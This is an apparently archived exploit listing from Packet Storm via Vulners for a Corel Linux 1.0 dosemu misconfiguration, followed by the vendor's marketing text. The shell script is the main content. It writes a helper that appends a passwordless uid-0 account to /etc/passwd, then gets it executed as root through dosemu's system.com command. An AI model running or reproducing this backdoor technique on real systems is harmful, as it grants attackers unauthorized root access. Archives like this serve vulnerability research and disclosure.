Lucene search
K

dosemu.sh

🗓️ 01 Mar 2000 00:00:00Reported by SuidType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

Corel Linux dosemu config issue allows local root access via system.com command misuse.

Code
`#  
#  
# [email protected] - Corel Linux dosemu config error. Local root compromise.  
#  
# Software: Corel Linux 1.0 dosemu distribution configuration  
# URL: http://linux.corel.com  
# Version: Version 1.0  
#  
# The system.com command is available to any user who runs the  
# dos emulator. This is a direct violation of the advice from   
# the SECURITY readme file:  
#  
# Never allow the 'system.com' command (part of dosemu)   
# to be executed. It makes dosemu execute the libc  
# 'system() function'. Though privileges are turned off,  
# the process inherits the switched uid-setting (uid=root,  
# euid=user), hence the unix process can use setreuid to  
# gain root access back. ... the rest you can imagine your self.   
#  
  
  
id  
cat > hack-corel <<EOF  
  
#!/bin/bash  
echo "owned::0:0::/:/bin/bash" >> /etc/passwd  
EOF  
  
chmod a+rx hack-corel   
export PATH="$PATH:."  
dos  
  
echo "when you hit a C:\ prompt, type 'system hack-core'"  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation